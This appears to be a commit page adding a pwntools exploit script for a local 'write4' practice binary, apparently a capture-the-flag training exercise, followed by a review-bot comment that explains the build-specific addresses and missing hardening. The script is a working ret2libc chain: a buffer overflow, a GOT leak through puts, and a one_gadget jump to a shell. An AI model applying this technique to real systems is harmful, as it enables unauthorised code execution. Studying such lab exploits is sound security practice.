exploit for 64-bit write4 binary
AravGarg authored Mar 28, 2020
1 parent fbf1c74 commit cbd9161
Showing 1 changed file with 34 additions and 0 deletions.
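--- a/write4_64.py
+++ b/write4_64.py
@@ -0,0 +1,34 @@
+from pwn import *
+target=process('./write4')
+elf=ELF('./write4')
+libc=elf.libc
+print(target.recvuntil("already!\n> "))
+
+payload="A"*40
+
+poprdi=0x400893
+puts_plt=0x4005d0
+puts_got=0x601018
+pwnme=0x4007b5
+one_gadget=0xe652b
+
+payload+=p64(poprdi)
+payload+=p64(puts_got)
+payload+=p64(puts_plt)
+payload+=p64(pwnme)
+payload+=p64(0x0)
+
+target.sendline(payload)
+
+leak=target.recvuntil("\x0a").strip("\x0a")
+libc_puts=u64(leak+"\x00"*(8-len(leak)))
+libc_base=libc_puts-libc.symbols["puts"]
+print(hex(libc_base))
+libc_gadget=libc_base+one_gadget
+
+payload="A"*40
+payload+=p64(libc_gadget)
+
+target.sendline(payload)
+target.interactive()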
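Review bot: The constants in write4_64.py (`poprdi`, `puts_plt`, `puts_got`, `pwnme`, `one_gadget`) and the 40-byte padding have no comment saying where they came from or which build they belong to, so the script cannot be checked or reused as a study example without redoing the analysis. I would add a header comment along the lines of `# Local lab script for the ./write4 practice binary; every address below is specific to one build of ./write4 and the libc it loads`, plus a short note on each constant. The hard-coded 0x400xxx/0x601xxx values suggest the target is built without PIE, and the direct overwrite after 40 bytes suggests there is no stack canary; stating that in the header tells a reader which standard hardening would stop this script. The header should also name the interpreter, since mixing `"A"*40` with `p64(...)` output appears to assume Python 2 string semantics.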
